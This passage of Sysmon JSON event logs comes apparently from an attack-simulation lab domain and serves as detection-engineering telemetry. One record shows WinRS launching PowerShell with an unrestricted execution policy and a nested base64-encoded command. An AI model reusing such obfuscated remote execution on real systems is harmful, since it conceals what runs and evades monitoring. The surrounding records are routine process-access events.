dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4493,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.472\r\nProcessGuid: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nProcessId: 1988\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {A837DB8D-0312-5F25-0000-0020C4B40600}\r\nLogonId: 0x6B4C4\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nParentProcessId: 1348\r\nParentImage: C:\\Windows\\System32\\winrshost.exe\r\nParentCommandLine: C:\\Windows\\system32\\WinrsHost.exe -Embedding","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.472","ProcessGuid":"{A837DB8D-0312-5F25-0000-0010BAB70600}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"C:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{A837DB8D-0312-5F25-0000-0020C4B40600}","LogonId":"0x6b4c4","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{A837DB8D-0312-5F25-0000-0010F4B40600}","ParentProcessId":"1348","ParentImage":"C:\\Windows\\System32\\winrshost.exe","ParentCommandLine":"C:\\Windows\\system32\\WinrsHost.exe -Embedding","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4494,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-0312-5F25-0000-0010F4B40600}\r\nSourceProcessId: 1348\r\nSourceThreadId: 4508\r\nSourceImage: C:\\Windows\\system32\\WinrsHost.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-0312-5F25-0000-0010F4B40600}","SourceProcessId":"1348","SourceThreadId":"4508","SourceImage":"C:\\Windows\\system32\\WinrsHost.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010BAB70600}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\system32\\WinrsHost.exe+2c94|C:\\Windows\\system32\\WinrsHost.exe+2eb1|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4495,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0312-5F25-0000-0010BAB70600}\r\nTargetProcessId: 1988\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0312-5F25-0000-0010BAB70600}","TargetProcessId":"1988","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4496,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4497,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:52:18.467","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:52:18","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:18","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4498,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:18.467\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\S